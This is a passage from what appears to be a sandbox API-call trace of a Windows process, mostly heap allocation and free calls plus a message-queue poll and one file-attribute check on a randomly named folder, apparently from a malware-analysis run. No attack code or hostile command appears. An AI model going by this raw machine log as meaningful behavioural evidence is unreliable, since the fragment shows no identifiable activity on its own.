0x10 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28c0 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0104.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0104.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2850 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0104.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2800 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0104.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0104.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0104.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0104.374] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0104.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0104.374] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0104.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.375] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x76) returned 0x407c248 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5360 | out: hHeap=0x1780000) returned 1 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314838 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x407c248 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.377] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0104.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.378] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0104.378] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0104.378] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0104.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0104.379] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca")) returned 0x10 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0104.379] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0104.379] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0104.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.380] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0104.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0104.380] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0104.380] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0104.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0104.381] RtlAllocateHeap (HeapHandle=0x1780000, 